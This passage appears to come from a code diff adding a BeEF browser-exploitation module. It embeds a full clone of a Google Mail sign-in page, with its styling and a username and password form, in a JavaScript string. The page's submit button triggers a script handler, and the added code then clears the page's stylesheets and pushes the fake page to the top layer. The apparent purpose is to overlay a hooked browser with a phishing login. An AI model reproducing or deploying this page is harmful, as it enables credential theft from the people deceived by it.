z-index: 2;   overflow: auto;   }   .goog-menuitem,   .goog-tristatemenuitem,   .goog-filterobsmenuitem {   position: relative;   color: #333;   cursor: pointer;   list-style: none;   margin: 0;   padding: 6px 7em 6px 30px;   white-space: nowrap;   }   .goog-menuitem-highlight,   .goog-menuitem-hover {   background-color: #eee;   border-color: #eee;   border-style: dotted;   border-width: 1px 0;   padding-top: 5px;   padding-bottom: 5px;   }   .goog-menuitem-highlight .goog-menuitem-content,   .goog-menuitem-hover .goog-menuitem-content {   color: #333;   }   .goog-menuseparator {   border-top: 1px solid #ebebeb;   margin-top: 9px;   margin-bottom: 10px;   }   .goog-inline-block {   position: relative;   display: -moz-inline-box;   display: inline-block;   }   * html .goog-inline-block {   display: inline;   }   *:first-child+html .goog-inline-block {   display: inline;   }   .dropdown-block {   display: block;   }   .goog-flat-menu-button {   -webkit-border-radius: 2px;   -moz-border-radius: 2px;   border-radius: 2px;   background-color: #f5f5f5;   background-image: -webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#f1f1f1));   background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: linear-gradient(top,#f5f5f5,#f1f1f1);   border: 1px solid #dcdcdc;   color: #444;   font-size: 11px;   font-weight: bold;   line-height: 27px;   list-style: none;   margin: 0 2px;   min-width: 46px;   outline: none;   padding: 0 18px 0 6px;   text-decoration: none;   vertical-align: middle;   }   .goog-flat-menu-button-disabled {   background-color: #fff;   border-color: #f3f3f3;   color: #b8b8b8;   cursor: default;   }   .goog-flat-menu-button.goog-flat-menu-button-hover {   background-color: #f8f8f8;   background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: linear-gradient(top,#f8f8f8,#f1f1f1);   -webkit-box-shadow: 0 1px 1px rgba(0,0,0,.1);   -moz-box-shadow: 0 1px 1px rgba(0,0,0,.1);   box-shadow: 0 1px 1px rgba(0,0,0,.1);   border-color: #c6c6c6;   color: #333;   }   .goog-flat-menu-button.goog-flat-menu-button-focused {   border-color: #4d90fe;   }   .form-error .goog-flat-menu-button {   border: 1px solid #dd4b39;   }   .form-error .goog-flat-menu-button-focused {   border-color: #4d90fe;   }   .goog-flat-menu-button.goog-flat-menu-button-open,   .goog-flat-menu-button.goog-flat-menu-button-active {   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,.1);   background-color: #eee;   background-image: -webkit-linear-gradient(top,#eee,#e0e0e0);   background-image: -moz-linear-gradient(top,#eee,#e0e0e0);   background-image: -ms-linear-gradient(top,#eee,#e0e0e0);   background-image: -o-linear-gradient(top,#eee,#e0e0e0);   background-image: linear-gradient(top,#eee,#e0e0e0);   border: 1px solid #ccc;   color: #333;   z-index: 2;   }   .goog-flat-menu-button-caption {   vertical-align: top;   white-space: nowrap;   }   .goog-flat-menu-button-dropdown {   border-color: #777 transparent;   border-style: solid;   border-width: 4px 4px 0;   height: 0;   width: 0;   position: absolute;   right: 5px;   top: 12px;   }   .jfk-select .goog-flat-menu-button-dropdown {   background: url(//ssl.gstatic.com/ui/v1/disclosure/grey-disclosure-arrow-up-down.png) center no-repeat;   border: none;   height: 11px;   margin-top: -4px;   width: 7px;   }   .goog-menu-nocheckbox .goog-menuitem,   .goog-menu-noicon .goog-menuitem {   padding-left: 16px;   vertical-align: middle;   }   body ::-webkit-scrollbar {   height: 16px;   width: 16px;   overflow: visible;   }   body ::-webkit-scrollbar-button {   height: 0;   width: 0;   }   body ::-webkit-scrollbar-track {   background-clip: padding-box;   border: solid transparent;   border-width: 0 0 0 7px;   }   body ::-webkit-scrollbar-track:horizontal {   border-width: 7px 0 0;   }   body ::-webkit-scrollbar-track:hover {   background-color: rgba(0,0,0,.05);   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.1);   box-shadow: inset 1px 0 0 rgba(0,0,0,.1);   }   body ::-webkit-scrollbar-track:horizontal:hover {   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.1);   box-shadow: inset 0 1px 0 rgba(0,0,0,.1);   }   body ::-webkit-scrollbar-track:active {   background-color: rgba(0,0,0,.05);   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   }   body ::-webkit-scrollbar-track:horizontal:active {   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar-dark::-webkit-scrollbar-track:hover {   background-color: rgba(255,255,255,.1);   -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.2);   box-shadow: inset 1px 0 0 rgba(255,255,255,.2);   }   .jfk-scrollbar-dark::-webkit-scrollbar-track:horizontal:hover {   -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2);   box-shadow: inset 0 1px 0 rgba(255,255,255,.2);   }   .jfk-scrollbar-dark::-webkit-scrollbar-track:active {   background-color: rgba(255,255,255,.1);   -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15);   box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15);   }   .jfk-scrollbar-dark::-webkit-scrollbar-track:horizontal:active {   -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15);   box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15);   }   body ::-webkit-scrollbar-thumb {   background-color: rgba(0,0,0,.2);   background-clip: padding-box;   border: solid transparent;   border-width: 0 0 0 7px;   min-height: 28px;   padding: 100px 0 0;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);   }   body ::-webkit-scrollbar-thumb:horizontal {   border-width: 7px 0 0;   padding: 0 0 0 100px;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07);   }   body ::-webkit-scrollbar-thumb:hover {   background-color: rgba(0,0,0,.4);   -webkit-box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);   box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);   }   body ::-webkit-scrollbar-thumb:active {   background-color: rgba(0,0,0,.5);   -webkit-box-shadow: inset 1px 1px 3px rgba(0,0,0,.35);   box-shadow: inset 1px 1px 3px rgba(0,0,0,.35);   }   .jfk-scrollbar-dark::-webkit-scrollbar-thumb {   background-color: rgba(255,255,255,.3);   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1);   }   .jfk-scrollbar-dark::-webkit-scrollbar-thumb:horizontal {   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1);   }   .jfk-scrollbar-dark::-webkit-scrollbar-thumb:hover {   background-color: rgba(255,255,255,.6);   -webkit-box-shadow: inset 1px 1px 1px rgba(255,255,255,.37);   box-shadow: inset 1px 1px 1px rgba(255,255,255,.37);   }   .jfk-scrollbar-dark::-webkit-scrollbar-thumb:active {   background-color: rgba(255,255,255,.75);   -webkit-box-shadow: inset 1px 1px 3px rgba(255,255,255,.5);   box-shadow: inset 1px 1px 3px rgba(255,255,255,.5);   }   .jfk-scrollbar-borderless::-webkit-scrollbar-track {   border-width: 0 1px 0 6px   }   .jfk-scrollbar-borderless::-webkit-scrollbar-track:horizontal {   border-width: 6px 0 1px   }   .jfk-scrollbar-borderless::-webkit-scrollbar-track:hover {   background-color: rgba(0,0,0,.035);   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar-borderless.jfk-scrollbar-dark::-webkit-scrollbar-track:hover {   background-color: rgba(255,255,255,.07);   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15);   }   .jfk-scrollbar-borderless::-webkit-scrollbar-thumb {   border-width: 0 1px 0 6px;   }   .jfk-scrollbar-borderless::-webkit-scrollbar-thumb:horizontal {   border-width: 6px 0 1px;   }   body ::-webkit-scrollbar-corner {   background: transparent;   }   body::-webkit-scrollbar-track-piece {   background-clip: padding-box;   background-color: #f1f1f1;   border: solid #fff;   border-width: 0 0 0 3px;   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   }   body::-webkit-scrollbar-track-piece:horizontal {   border-width: 3px 0 0;   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   }   body::-webkit-scrollbar-thumb {   border-width: 1px 1px 1px 5px;   }   body::-webkit-scrollbar-thumb:horizontal {   border-width: 5px 1px 1px;   }   body::-webkit-scrollbar-corner {   background-clip: padding-box;   background-color: #f1f1f1;   border: solid #fff;   border-width: 3px 0 0 3px;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);   }   .jfk-scrollbar::-webkit-scrollbar {   height: 16px;   overflow: visible;   width: 16px;   }   .jfk-scrollbar::-webkit-scrollbar-button {   height: 0;   width: 0;   }   .jfk-scrollbar::-webkit-scrollbar-track {   background-clip: padding-box;   border: solid transparent;   border-width: 0 0 0 7px;   }   .jfk-scrollbar::-webkit-scrollbar-track:horizontal {   border-width: 7px 0 0;   }   .jfk-scrollbar::-webkit-scrollbar-track:hover {   background-color: rgba(0,0,0,.05);   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.1);   box-shadow: inset 1px 0 0 rgba(0,0,0,.1);   }   .jfk-scrollbar::-webkit-scrollbar-track:horizontal:hover {   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.1);   box-shadow: inset 0 1px 0 rgba(0,0,0,.1);   }   .jfk-scrollbar::-webkit-scrollbar-track:active {   background-color: rgba(0,0,0,.05);   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   }   .jfk-scrollbar::-webkit-scrollbar-track:horizontal:active {   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:hover {   background-color: rgba(255,255,255,.1);   -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.2);   box-shadow: inset 1px 0 0 rgba(255,255,255,.2);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:horizontal:hover {   -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2);   box-shadow: inset 0 1px 0 rgba(255,255,255,.2);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:active {   background-color: rgba(255,255,255,.1);   -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15);   box-shadow: inset 1px 0 0 rgba(255,255,255,.25),inset -1px 0 0 rgba(255,255,255,.15);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:horizontal:active {   -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15);   box-shadow: inset 0 1px 0 rgba(255,255,255,.25),inset 0 -1px 0 rgba(255,255,255,.15);   }   .jfk-scrollbar::-webkit-scrollbar-thumb {   background-color: rgba(0,0,0,.2);   background-clip: padding-box;   border: solid transparent;   border-width: 0 0 0 7px;   min-height: 28px;   padding: 100px 0 0;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar::-webkit-scrollbar-thumb:horizontal {   border-width: 7px 0 0;   padding: 0 0 0 100px;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset -1px 0 0 rgba(0,0,0,.07);   }   .jfk-scrollbar::-webkit-scrollbar-thumb:hover {   background-color: rgba(0,0,0,.4);   -webkit-box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);   box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);   }   .jfk-scrollbar::-webkit-scrollbar-thumb:active {   background-color: rgba(0,0,0,0.5);   -webkit-box-shadow: inset 1px 1px 3px rgba(0,0,0,0.35);   box-shadow: inset 1px 1px 3px rgba(0,0,0,0.35);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb {   background-color: rgba(255,255,255,.3);   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset 0 -1px 0 rgba(255,255,255,.1);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb:horizontal {   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.15),inset -1px 0 0 rgba(255,255,255,.1);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb:hover {   background-color: rgba(255,255,255,.6);   -webkit-box-shadow: inset 1px 1px 1px rgba(255,255,255,.37);   box-shadow: inset 1px 1px 1px rgba(255,255,255,.37);   }   .jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-thumb:active {   background-color: rgba(255,255,255,.75);   -webkit-box-shadow: inset 1px 1px 3px rgba(255,255,255,.5);   box-shadow: inset 1px 1px 3px rgba(255,255,255,.5);   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-track {   border-width: 0 1px 0 6px;   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-track:horizontal {   border-width: 6px 0 1px;   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-track:hover {   background-color: rgba(0,0,0,.035);   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.14),inset -1px -1px 0 rgba(0,0,0,.07);   }   .jfk-scrollbar-borderless.jfk-scrollbar-dark.jfk-scrollbar::-webkit-scrollbar-track:hover {   background-color: rgba(255,255,255,.07);   -webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15);   box-shadow: inset 1px 1px 0 rgba(255,255,255,.25),inset -1px -1px 0 rgba(255,255,255,.15);   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-thumb {   border-width: 0 1px 0 6px;   }   .jfk-scrollbar-borderless.jfk-scrollbar::-webkit-scrollbar-thumb:horizontal {   border-width: 6px 0 1px;   }   .jfk-scrollbar::-webkit-scrollbar-corner {   background: transparent;   }   body.jfk-scrollbar::-webkit-scrollbar-track-piece {   background-clip: padding-box;   background-color: #f1f1f1;   border: solid #fff;   border-width: 0 0 0 3px;   -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   box-shadow: inset 1px 0 0 rgba(0,0,0,.14),inset -1px 0 0 rgba(0,0,0,.07);   }   body.jfk-scrollbar::-webkit-scrollbar-track-piece:horizontal {   border-width: 3px 0 0;   -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   box-shadow: inset 0 1px 0 rgba(0,0,0,.14),inset 0 -1px 0 rgba(0,0,0,.07);   }   body.jfk-scrollbar::-webkit-scrollbar-thumb {   border-width: 1px 1px 1px 5px;   }   body.jfk-scrollbar::-webkit-scrollbar-thumb:horizontal {   border-width: 5px 1px 1px;   }   body.jfk-scrollbar::-webkit-scrollbar-corner {   background-clip: padding-box;   background-color: #f1f1f1;   border: solid #fff;   border-width: 3px 0 0 3px;   -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);   box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);   }   .errormsg {   margin: .5em 0 0;   display: block;   color: #dd4b39;   line-height: 17px;   }   .help-link {   background: #dd4b39;   padding: 0 5px;   color: #fff;   font-weight: bold;   display: inline-block;   -webkit-border-radius: 1em;   -moz-border-radius: 1em;   border-radius: 1em;   text-decoration: none;   position: relative;   top: 0px;   }   .help-link:visited {   color: #fff;   }   .help-link:hover {   color: #fff;   background: #c03523;   text-decoration: none;   }   .help-link:active {   opacity: 1;   background: #ae2817;   } </style> <style type='text/css'>   .main {   width: auto;   max-width: 1000px;   min-width: 780px;   }   .product-info {   margin: 0 385px 0 0;   }   .product-info h3 {   font-size: 1.23em;   font-weight: normal;   }   .product-info a:visited {   color: #61c;   }   .product-info .g-button:visited {   color: #666;   }   .sign-in {   width: 335px;   float: right;   }   .signin-box,   .accountchooser-box {   margin: 12px 0 0;   padding: 20px 25px 15px;   background: #f1f1f1;   border: 1px solid #e5e5e5;   }   .product-headers {   margin: 0 0 1.5em;   }   .product-headers h1 {   font-size: 25px;   margin: 0 !important;   }   .product-headers h2 {   font-size: 16px;   margin: .4em 0 0;   }   .features {   overflow: hidden;   margin: 2em 0 0;   }   .features li {   margin: 3px 0 2em;   }   .features img {   float: left;   margin: -3px 0 0;   }   .features p {   margin: 0 0 0 68px;   }   .features .title {   font-size: 16px;   margin-bottom: .3em;   }   .features.no-icon p {   margin: 0;   }   .features .small-title {   font-size: 1em;   font-weight: bold;   }   .notification-bar {   background: #f9edbe;   padding: 8px;   } </style> <style type='text/css'>   .signin-box h2 {   font-size: 16px;   line-height: 17px;   height: 16px;   margin: 0 0 1.2em;   position: relative;   }   .signin-box h2 strong {   display: inline-block;   position: absolute;   right: 0;   top: 1px;   height: 19px;   width: 52px;   background: transparent url(//ssl.gstatic.com/accounts/ui/google-signin-flat.png) no-repeat;   }   .signin-box div {   margin: 0 0 1.5em;   }   .signin-box label {   display: block;   }   .signin-box input[type=text],   .signin-box input[type=password] {   width: 100%;   height: 32px;   font-size: 15px;   direction: ltr;   }   .signin-box .email-label,   .signin-box .passwd-label {   font-weight: bold;   margin: 0 0 .5em;   display: block;   -webkit-user-select: none;   -moz-user-select: none;   user-select: none;   }   .signin-box .reauth {   display: inline-block;   font-size: 15px;   height: 29px;   line-height: 29px;   margin: 0;   }   .signin-box label.remember {   display: inline-block;   vertical-align: top;   margin: 9px 0 0;   }   .signin-box .remember-label {   font-weight: normal;   color: #666;   line-height: 0;   padding: 0 0 0 .4em;   -webkit-user-select: none;   -moz-user-select: none;   user-select: none;   }   .signin-box input[type=submit] {   margin: 0 1.5em 1.2em 0;   height: 32px;   font-size: 13px;   }   .signin-box ul {   margin: 0;   }   .signin-box .training-msg {   padding: .5em 8px;   background: #f9edbe;   }   .signin-box .training-msg p {   margin: 0 0 .5em;   } </style>   <style type='text/css'> .mail .mailPromo {   border: 1px solid #ebebeb;   margin-top: 25px;   padding: 10px 10px 0px 10px; } .mail .mailPromoIcon {   float: left;   padding-bottom: 10px;   padding-right: 9px; } .mail .mailPromoNew {   color: red; } .mail .mailPromoIconLarge {   float: left;   padding-bottom: 10px;   padding-right: 9px;   margin-top: 0px; } .mail .mailPromoHead {   padding-top: 7px;   padding-bottom: 0;   margin-bottom: 5px; } .mail .mailPromoBody {   padding-top: 4px;   margin-bottom: 10px; } .mail ul.mail-links {   list-style: none;   margin: 0;   overflow: hidden; } .mail ul.mail-links li {   float: left;   margin: 0 20px 0 0; } </style> <link rel='publisher' href='https://plus.google.com/103345707817934461425' />   </head>   <body>   <div class='wrapper'>   <div class='google-header-bar'>   <div class='header content clearfix'>   <img class='logo' src='//ssl.gstatic.com/images/logos/google_logo_41.png' alt='Google'>   <span class='signup-button'>   New to Google Mail?   <a id='link-signup' class='g-button g-button-red' href='https://accounts.google.com/SignUp?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dmm&amp;ltmpl=googlemail'>   Create an account   </a>   </span>   </div>   </div>   <div class='main content clearfix'>   <div class='sign-in'> <div class='signin-box'>   <h2>Sign in <strong></strong></h2>   <form id='gaia_loginform' action='javascript:void(0);' method='post'>   <input type='hidden'            name='continue' id='continue' value='https://mail.google.com/mail/?tab=mm'      >   <input type='hidden'            name='service' id='service' value='mail'      >   <input type='hidden'            name='rm' id='rm' value='false'      >   <input type='hidden'            name='dsh' id='dsh' value='-2663017759600220251'      >   <input type='hidden'            name='ltmpl' id='ltmpl' value='googlemail'      >   <input type='hidden'            name='scc' id='scc' value='1'      >   <input type='hidden'          name='GALX'          value='FVvSTtLIZzE'>   <input type='hidden'     id='pstMsg'     name='pstMsg'     value='0'>   <input type='hidden'     id='dnConn'     name='dnConn'     value=''>   <input type='hidden'     id='checkConnection'     name='checkConnection'     value=''>   <input type='hidden'     id='checkedDomains'     name='checkedDomains'     value='youtube'> <input type='hidden' name='timeStmp' id='timeStmp'        value=''/> <input type='hidden' name='secTok' id='secTok'        value=''/> <div class='email-div'>   <label for='Email'><strong class='email-label'>Username</strong></label>   <input type='text' spellcheck='false'             name='Email' id='Email' value=''                 > </div> <div class='passwd-div'>   <label for='Passwd'><strong class='passwd-label'>Password</strong></label>   <input type='password' name='Passwd' id='Passwd'                  > </div>   <input type='submit' class='g-button g-button-submit' name='signIn' id='signIn' onclick='clickedSubmitButton()' value='Sign in'>   <label class='remember' onclick=''>   <input type='checkbox'    name='PersistentCookie' id='PersistentCookie' value='yes'         >   <strong class='remember-label'>   Stay signed in   </strong>   </label>   <input type='hidden' name='rmShown' value='1'>   </form>   <ul>   <li>   <a id='link-forgot-passwd'           href='https://accounts.google.com/RecoverAccount?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dmm'           target='_top'>   Can&#39;t access your account?   </a>   </li>   </ul> </div>   </div>   <div class='product-info mail'> <div class='product-headers'>   <h1 class='redtext'>Google Mail</h1>   <h2>A Google approach to email.</h2> </div>   <p>   Google Mail is built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Google Mail has: </p> <ul class='features'>   <li>   <img src='//ssl.gstatic.com/images/icons/feature/filing_cabinet-g42.png' alt=''>   <p class='title'>Lots of space</p>   <p>   Over <span id=quota>2757.272164</span> megabytes (and counting) of free storage.   </p>   </li>   <li>   <img src='//ssl.gstatic.com/images/icons/feature/nosign-r42.png' alt=''>   <p class='title'>Less spam</p>   <p>Keep unwanted messages out of your inbox.</p>   </li>   <li>   <img src='//ssl.gstatic.com/images/icons/feature/mobile_phone-42.gif' alt=''>   <p class='title'>Mobile access</p>   <p>Get Google Mail on your mobile phone. <a href='http://www.google.com/intl/en_DE/mobile/mail/#utm_source=en_DE-cpp-g4mc-gmhp&utm_medium=cpp&utm_campaign=en_DE'>Learn more</a></p>   </li> </ul> <ul class='mail-links'>   <li><a href='http://mail.google.com/mail/help/intl/en/about.html' onclick='_gaq.push(['_link', 'http://mail.google.com/mail/help/intl/en/about.html', 'true']); return false;'>   About Google Mail</a></li>   <li><a href='http://mail.google.com/mail/help/intl/en/about_whatsnew.html' onclick='_gaq.push(['_link', 'http://mail.google.com/mail/help/about_whatsnew.html', 'true']); return false;'>New features!</a></li>   <li><a href='http://mail.google.com/mail/help/intl/en/switch.html' onclick='_gaq.push(['_link', 'http://mail.google.com/mail/help/intl/en/switch.html', 'true']); return false;'>Switch to Google Mail</a></li>   <li>   <a href='https://accounts.google.com/SignUp?service=mail&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Ftab%3Dmm&ltmpl=googlemail'>   Create an account   </a>   </li> </ul>   <div class='mailPromo'>   <img src='//ssl.gstatic.com/images/icons/product/apps-64.png' class='mailPromoIcon'>   <h4>Take Google Mail to work with Google Apps for Business</h4>   <p class='mailPromoBody'>Love Google Mail, but looking for a custom email address for your company?<br>   Get business email, calendar, and online docs @your_company.com.   <a href='http://www.google.com/apps/intl/en/business/gmail.html#utm_campaign=en&amp;utm_source=gmail_en_US&amp;utm_medium=et&amp;utm_term=login_promo'>   Learn more</a></p>   </div>   </div>   <div id='cc_iframe_parent'></div>   </div> <div class='google-footer-bar'>   <div class='footer content clearfix'>   <ul>   <li>© 2012 Google</li>   <li><a href='http://www.google.com/apps/intl/en/business/gmail.html#utm_medium=et&utm_source=gmail-signin-en&utm_campaign=crossnav' target='_blank'>Google Mail for Work</a></li>   <li><a href='http://mail.google.com/mail/help/intl/en/terms.html' target='_blank'>Terms &amp; Privacy</a></li>   <li><a href='http://mail.google.com/support/?hl=en' target='_blank'>Help</a></li>   </ul>   <form>   <select id='lang-chooser' class='lang-chooser' style='display: none;'>   <option value='ms'          >   Bahasa Malaysia   </option>   <option value='ca'          >   Català   </option>   <option value='cy'          >   Cymraeg   </option>   <option value='da'          >   Dansk   </option>   <option value='de'          >   Deutsch   </option>   <option value='en'         selected='selected' >   English   </option>   <option value='en-GB'          >   English (UK)   </option>   <option value='es'          >   Español   </option>   <option value='es-419'          >   Español de Latinoamérica   </option>   <option value='eu'          >   Euskara   </option>   <option value='fil'          >   Filipino   </option>   <option value='fr'          >   Français   </option>   <option value='hr'          >   Hrvatski   </option>   <option value='in'          >   Indonesia   </option>   <option value='it'          >   Italiano   </option>   <option value='sw'          >   Kiswahili   </option>   <option value='lv'          >   Latviešu valoda   </option>   <option value='lt'          >   Lietuvių   </option>   <option value='nl'          >   Nederlands   </option>   <option value='no'          >   Norsk   </option>   <option value='pt-BR'          >   Português (Brasil)   </option>   <option value='pt-PT'          >   Português (Portugal)   </option>   <option value='ro'          >   Română   </option>   <option value='sk'          >   Slovenčina   </option>   <option value='sl'          >   Slovenščina   </option>   <option value='sv'          >   Svenska   </option>   <option value='tl'          >   Tagalog   </option>   <option value='vi'          >   Tiếng Việt   </option>   <option value='tr'          >   Türkçe   </option>   <option value='et'          >   eesti keel   </option>   <option value='hu'          >   magyar   </option>   <option value='pl'          >   polski   </option>   <option value='fi'          >   suomi   </option>   <option value='is'          >   íslenska   </option>   <option value='cs'          >   čeština   </option>   <option value='el'          >   Ελληνικά   </option>   <option value='ru'          >   Русский   </option>   <option value='uk'          >   Українська   </option>   <option value='bg'          >   български   </option>   <option value='sr'          >   српски   </option>   <option value='iw'          >   עברית   </option>   <option value='ur'          >   اردو   </option>   <option value='ar'          >   العربية   </option>   <option value='fa'          >   فارسی   </option>   <option value='mr'          >   मराठी   </option>   <option value='hi'          >   हिंदी   </option>   <option value='bn'          >   বাংলা   </option>   <option value='gu'          >   ગુજરાતી   </option>   <option value='ta'          >   தமிழ்   </option>   <option value='te'          >   తెలుగు   </option>   <option value='kn'          >   ಕನ್ನಡ   </option>   <option value='ml'          >   മലയാളം   </option>   <option value='th'          >   ไทย   </option>   <option value='am'          >   አማርኛ   </option>   <option value='zh-TW'          >   中文 (繁體)   </option>   <option value='zh-CN'          >   中文（简体）   </option>   <option value='ja'          >   日本語   </option>   <option value='ko'          >   한국어   </option>   </select>   </form>   </div> </div>      </div>   </body> </html> ";
+    var zztop = beef.dom.getHighestZindex()+1;
+    beef.dom.removeStylesheets();
